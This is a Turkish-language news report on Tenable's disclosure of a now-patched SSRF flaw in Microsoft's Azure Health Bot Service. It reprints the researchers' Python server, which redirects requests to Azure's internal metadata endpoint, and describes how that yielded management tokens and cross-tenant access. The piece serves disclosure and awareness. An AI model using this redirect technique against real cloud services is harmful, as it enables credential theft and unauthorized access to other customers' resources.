Microsoft’un Azure’daki Güvenlik Açığı Saldırganların Sağlık Botu Hizmetlerini Tehlikeye Atmasına İzin Veriyor


Microsoft Azure'daki SSRF Güvenlik Açığı

Tenable Research, sağlık çalışanlarının yapay zeka destekli sanal sağlık asistanlarını devreye almasını sağlamak için tasarlanan bir bulut platformu olan Microsoft’un Azure Health Bot Service’inde önemli güvenlik açıkları ortaya çıkardı.

Azure AI Health Bot Service, sağlık kuruluşları için tasarlanmış bulut tabanlı bir platformdur. Geliştiricilerin, endüstri standartlarına uyumu garanti altına alırken süreçleri kolaylaştırmaya ve maliyetleri düşürmeye yardımcı olan AI destekli sanal sağlık asistanları oluşturmasını ve dağıtmasını sağlar.

DÖRT

Bu güvenlik açıkları, kiracılar arası kaynaklara yetkisiz erişime izin vererek, hizmet içindeki diğer kaynaklara olası yatay geçiş konusunda endişelere yol açtı.

Tenable’ın araştırması, Azure Health Bot Service’in harici veri kaynaklarıyla etkileşime girmesine olanak tanıyan “Veri Bağlantıları” adlı bir özelliğe odaklandı. Araştırmacılar bu veri bağlantılarını test ederken bir sunucu tarafı istek sahteciliği (SSRF) güvenlik açığı keşfettiler.

Bu güvenlik açığı, mevcut güvenlik filtrelerini aşmalarına ve Azure’un Dahili Meta Veri Hizmeti (IMDS) gibi hassas dahili uç noktalara erişmelerine olanak sağladı.

Easily analyze emerging malware with ANY.RUN interactive online sandbox - Try 14 Days Free Trial

Teknik Analiz

SSRF güvenlik açığı, saldırganların kontrol ettiği harici bir ana bilgisayara istekleri yeniden yönlendirecek şekilde bir veri bağlantısı yapılandırılarak istismar edildi.

Ana bilgisayar, araştırmacıların geçerli bir meta veri yanıtı elde etmelerine olanak tanıyan IMDS uç noktasına 301 yönlendirmesiyle yanıt verecek şekilde ayarlandı. Bu yanıtı kullanarak, management.azure.com için bir erişim belirteci edindiler ve ardından diğer müşterilere ait abonelikleri ve kaynakları listelediler.

Tannable araştırmacıları, SSRF saldırısını kolaylaştıran HTTP sunucusunu kurmak için bir Python betiği kullandılar:

#!/usr/bin/python3
from http.server import HTTPServer, BaseHTTPRequestHandler

def servePage(s, hverb):
    s.protocol_version = 'HTTP/1.1'
    s.server_version = 'Microsoft-IIS/8.5'
    s.sys_version = ''
    s.send_response(301)
    s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13')
    s.end_headers()
    message = ""
    s.wfile.write(bytes(message, "utf8"))
    return

class StaticServer(BaseHTTPRequestHandler):
    def do_GET(self):
        servePage(self, "GET")
        return

def main(server_class=HTTPServer, handler_class=StaticServer, port=80):
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    httpd.serve_forever()

main()

Saldırganlar, servisin senaryo düzenleyicisi içerisinde bir veri bağlantısı yapılandırarak kontrolleri altındaki harici bir ana bilgisayarı belirleyebilirler.

Bu ana bilgisayar, Azure’un IMDS’sine yönelik 301 yönlendirme yanıtıyla isteklere yanıt verecek şekilde yapılandırılmıştır. Bu tekniği kullanarak saldırganlar geçerli bir meta veri yanıtı elde edebilir ve ardından management.azure.com için bir erişim belirteci elde edebilir.

Müdahale ve Azaltma

Tenable, güvenlik açıklarını keşfettikten sonra bunları derhal 17 Haziran 2024’te Microsoft Güvenlik Yanıt Merkezi’ne (MSRC) bildirdi. MSRC, raporu hızla kabul etti ve düzeltmeleri uygulamaya başladı.

Microsoft, 2 Temmuz itibarıyla etkilenen tüm hizmet ve bölgelerin yamalandığını ve müşterilerin herhangi bir işlem yapmasına gerek olmadığını doğruladı.

Tenable daha sonra FHIR uç noktalarının veri bağlantılarını doğrulamak için başka bir savunmasız uç nokta tanımladı. Bu uç nokta benzer bir saldırıya karşı hassas olsa da, kiracılar arası erişime izin vermedi. Bu ikinci sorun 9 Temmuz’da bildirildi ve düzeltmeler 12 Temmuz’da uygulandı.

Bu açıklar, yapay zeka destekli hizmetlerde bile güçlü web uygulamalarının ve bulut güvenlik mekanizmalarının önemini vurguluyor.

Kötü niyetli kişilerin bu güvenlik açıklarını istismar ettiğine dair bir kanıt bulunmamakla birlikte, olay sürekli güvenlik denetimi ve proaktif güvenlik açığı yönetiminin gerekliliğini vurguluyor.

Free Webinar on Detecting & Blocking Supply Chain Attack -> Book your Spot



Source link